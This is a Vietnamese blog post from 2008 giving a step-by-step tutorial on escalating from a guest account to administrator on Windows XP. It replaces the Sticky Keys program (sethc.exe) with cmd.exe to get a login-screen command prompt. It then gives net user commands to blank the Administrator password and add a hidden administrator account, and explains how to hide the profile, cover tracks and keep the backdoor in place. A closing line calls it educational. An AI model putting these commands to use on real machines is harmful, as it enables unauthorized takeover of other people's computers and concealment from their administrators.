Chủ Nhật, 6 tháng 4, 2008

Hack Password Administrators (Mr.Cuong@banbeit.com)

Hack Password Administrators
Trong Windows XP có 1 chương trình gọi là StickyKey, khi chúng ta nhấn phím Shift nhiều lần (khoảng 5 lần)thì chương trình này sẽ hiện ra



File thực thi của chương trình này là c:\windows\system32\sethc.exe
Chúng ta sẽ Hack pass Admin từ lỗ hổng của chương trình này.
Khi sử dụng 1 máy tính nào đó mà chỉ có quyền của Guest hoặc Limited User,chúng ta cần cài đặt một ứng dụng nhưng ứng dụng này đòi hỏi quyền Admin mới có thể cài đặt.
Chà...chà...hack pass Quản Trị thôi!
Thực hiện theo các bước sau:
Bước 1:
Run: cmd
gõ vào các dòng lệnh sau:(khuyến khích nên gõ cho quen lệnh)

cd %systemroot%/system32 //vào thư mục system32
rename sethc.exe sethc.exe.bak //đổi tên sethc.exe thành sethc.bak
copy cmd.exe sethc.exe /y //thay thế file sethc.exe bằng file cmd.exe

(hoặc mở Notepad, paste đoạn mã trên vào và lưu lại với tên là crack.cmd Sau đó nhấp kép chuột lên file crack.cmd để thực thi.)
Bước 2:
Log off user đang dùng (Guest hoặc Limited user),từ cửa sổ chờ Login vào Windows, nhấp phím Shift 5 lần, nếu chương trình Command Prompt được gọi thay vì StickyKey thì bạn đã thành công!


Chương trình StickyKey đã được thay bằng Command Run


Ở cửa số Command Prompt này chúng ta sẽ có toàn quyền biến đổi tùy ý các Users có trên máy!
Bước 3:Một số lệnh Command:

Xem những user nào hiện có trên máy (kể cả các user ần)

net user

Xóa trắng password của Administrator(hay tương tự với bất kì user nào):

net user Administrator cái này thì ko nên tí nào! dễ lộ lắm!hehe..

Thêm tài khoản MrCuong với pw là happend vào hệ thống

net user MrCuong happend /add

Gán tài khoản MrCuong vào nhóm Quản Trị :

net localgroup Administrators MrCuong /add

Sau khi thực hiện các lệnh trên thì MrCuong đã là một thành viên của Administrators,có thể đăng nhập vào hệ thống mà không cần khởi động lại máy!
Sau khi dùng xong tài khoản mới tạo thì xóa đi để giấu dấu vết.

net user MrCuong /delete

Ẩn profile ứng với tài khoản MrCuong(xóa thì lâu lắm)

attrib +s +h +r C:\Documents and Settings\MrCuong

Với những Quản Trị Viên chuyên nghiệp thì sẽ biết có sự tồn tại của Profile mới tạo nhưng cmd.exe đã đổi tên thành sethc.exe vẫn còn trong System32, thì chúng ta vẫn còn nắm quyền kiểm soát!Hehehe...
.


Bài viết chỉ mang tính chất trao đổi, học hỏi. Không khuyến khích anh em áp dụng phá hoại máy tính người khác!